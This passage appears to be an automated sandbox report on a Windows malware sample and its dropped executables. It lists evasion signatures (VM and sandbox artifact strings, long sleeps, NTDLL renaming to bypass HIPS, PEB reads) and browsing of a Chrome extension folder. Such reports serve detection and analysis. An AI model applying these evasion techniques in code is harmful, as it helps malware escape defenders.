Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DF3A.exe PID: 5464, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Md0q201V1D.exe, 00000003.00000002.338184490.00000000006AB000.00000004.00000020.sdmp, 21.exe, 00000013.00000002.400887733.0000000001F60000.00000004.00000001.sdmp, CBF0.exe, 0000001D.00000002.454053510.000000000323E000.00000004.00000020.sdmp	Binary or memory string: ASWHOOK
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLUSER

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Renames NTDLL to bypass HIPS

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\B096.exe TID: 4200	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C066.exe TID: 7772	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\B096.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe

Window / User API: threadDelayed 571

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F11E.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1AC.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CD17.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C295.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C8FE.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DEDC.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D8D0.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E64F.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FD36.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CAC5.exe			Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

Code function: 29_2_6B576B90 rdtsc

29_2_6B576B90

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Local\Temp\B096.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: VMwareVBoxARun using valid operating system
Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.333031309.000000000EF11000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp	Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Queries a list of all running processes

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Process information queried: ProcessInformation

Jump to behavior

Queries a list of all running drivers

Source: C:\Users\user\Desktop\Md0q201V1D.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\Md0q201V1D.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	System information queried: CodeIntegrityInformation			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Code function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00426B90

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 14_2_02BE0042 push dword ptr fs:[00000030h]		14_2_02BE0042
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 16_2_02D4D529 push dword ptr fs:[00000030h]		16_2_02D4D529
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 23_2_02CB0042 push dword ptr fs:[00000030h]		23_2_02CB0042
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 23_2_02EB2B61 push dword ptr fs:[00000030h]		23_2_02EB2B61
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]		29_2_6B573B5A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]		29_2_6B573B5A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]		29_2_6B573B5A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]		29_2_6B573B5A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F340 mov eax, dword ptr fs:[00000030h]		29_2_6B54F340
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54DB40 mov eax, dword ptr fs:[00000030h]		29_2_6B54DB40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B7A mov eax, dword ptr fs:[00000030h]		29_2_6B573B7A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B7A mov eax, dword ptr fs:[00000030h]		29_2_6B573B7A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h]		29_2_6B5D6365
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h]		29_2_6B5D6365
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h]		29_2_6B5D6365
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618B58 mov eax, dword ptr fs:[00000030h]		29_2_6B618B58
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60131B mov eax, dword ptr fs:[00000030h]		29_2_6B60131B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D4320 mov eax, dword ptr fs:[00000030h]		29_2_6B5D4320
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C53CA mov eax, dword ptr fs:[00000030h]		29_2_6B5C53CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C53CA mov eax, dword ptr fs:[00000030h]		29_2_6B5C53CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5423F6 mov eax, dword ptr fs:[00000030h]		29_2_6B5423F6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F23E3 mov ecx, dword ptr fs:[00000030h]		29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F23E3 mov ecx, dword ptr fs:[00000030h]		29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F23E3 mov eax, dword ptr fs:[00000030h]		29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B541BE9 mov eax, dword ptr fs:[00000030h]		29_2_6B541BE9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56DBE9 mov eax, dword ptr fs:[00000030h]		29_2_6B56DBE9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544B94 mov edi, dword ptr fs:[00000030h]		29_2_6B544B94
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601BA8 mov eax, dword ptr fs:[00000030h]		29_2_6B601BA8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5EEB8A mov ecx, dword ptr fs:[00000030h]		29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h]		29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h]		29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h]		29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618BB6 mov eax, dword ptr fs:[00000030h]		29_2_6B618BB6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B619BBE mov eax, dword ptr fs:[00000030h]		29_2_6B619BBE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FD380 mov ecx, dword ptr fs:[00000030h]		29_2_6B5FD380
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60138A mov eax, dword ptr fs:[00000030h]		29_2_6B60138A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h]		29_2_6B574BAD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h]		29_2_6B574BAD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h]		29_2_6B574BAD
